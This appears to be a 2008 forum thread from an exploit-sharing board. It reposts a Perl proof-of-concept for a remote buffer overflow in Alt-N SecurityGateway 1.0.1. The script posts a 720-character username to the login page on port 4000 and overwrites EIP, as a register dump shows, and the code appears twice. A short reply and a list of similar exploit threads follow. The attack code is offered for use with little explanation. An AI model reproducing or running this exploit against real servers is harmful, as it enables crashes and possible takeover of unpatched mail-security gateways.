SecurityGateway 1.0.1 Remote Buffer Overflow

UnknownBug · 06-08-2008

###########
# SecurityGateway 1.0.1 Remote Buffer Overflow ( username)
# Vendor: Alt-N Technologies: MDaemon Email Server for Windows, SecurityPlus for MDaemon, RelayFax
# risk : critical
#SecurityGateway open port 4000 for remote administration/managment, EIP get owned when the username field is filled with 720 chars
#
#eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000
#eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
#63636363 ?? ???
#
# Replace cPanel® with your remote host.

use LWP::UserAgent;
$connect = LWP::UserAgent->new;
my $payload1 ="a" x 236;
my $payload2 ="b" x 480;
my $eip_owned = "c" x 4;

print "SecurityGateway Remote BoF exploit by securfrog.\n\n";
my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll');
$req->content_type('application/x-www-form-urlencoded');
$req->content('RequestedPage=login&username='.$payload2 .$eip_owned.$payload1.'&passwd=world&lang=en&logon =Sign+In');
my $res = $connect->request($req);
print $res->as_string;
print "Exploit successfull\n";

Ismaelstyle · 06-10-2008

Quiet tight this one

06-08-2008	#1 (permalink)
UnknownBug Experienced Member Join Date: Mar 2008 Location: Europe Posts: 294 Thanks: 1 Thanked 5 Times in 3 Posts Rep Power: 36	SecurityGateway 1.0.1 Remote Buffer Overflow ########### # SecurityGateway 1.0.1 Remote Buffer Overflow ( username) # Vendor: Alt-N Technologies: MDaemon Email Server for Windows, SecurityPlus for MDaemon, RelayFax # risk : critical #SecurityGateway open port 4000 for remote administration/managment, EIP get owned when the username field is filled with 720 chars # #eax=00000000 ebx=00000000 ecx=63636363 edx=7c9137d8 esi=00000000 edi=00000000 #eip=63636363 esp=042ce910 ebp=042ce930 iopl=0 nv up ei pl zr na pe nc #cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 #63636363 ?? ??? # # Replace cPanel® with your remote host. use LWP::UserAgent; $connect = LWP::UserAgent->new; my $payload1 ="a" x 236; my $payload2 ="b" x 480; my $eip_owned = "c" x 4; print "SecurityGateway Remote BoF exploit by securfrog.\n\n"; my $req = HTTP::Request->new(POST => 'http://127.0.0.1:4000/SecurityGateway.dll'); $req->content_type('application/x-www-form-urlencoded'); $req->content('RequestedPage=login&username='.$payload2 .$eip_owned.$payload1.'&passwd=world&lang=en&logon =Sign+In'); my $res = $connect->request($req); print $res->as_string; print "Exploit successfull\n"; __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. Add me reputation if you enjoyed this post

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
Alt-N SecurityGateway Username Buffer Overflow (Exploit)	Armageddon	Exploit Codes	0	08-02-2008 12:21 PM
SecurityGateway 1.0.1 (username) Remote Buffer Overflow PoC	Armageddon	Exploit Codes	1	06-10-2008 11:49 AM
Now SMS/MMS Gateway 5.5 Remote Buffer Overflow Exploit	ThE KinG	Exploit Codes	0	06-06-2008 03:54 PM
ASUS DPC Proxy 2.0.0.16/2.0.0.19 Remote Buffer Overflow	Intruder	Exploit Codes	0	06-01-2008 01:15 PM
SMS/MMS Gateway v5.5 Remote Buffer Overflow	Intruder	Exploit Codes	0	06-01-2008 01:12 PM

06-10-2008	#2 (permalink)
Ismaelstyle Junior Member Join Date: May 2008 Posts: 7 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 0	Quiet tight this one

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)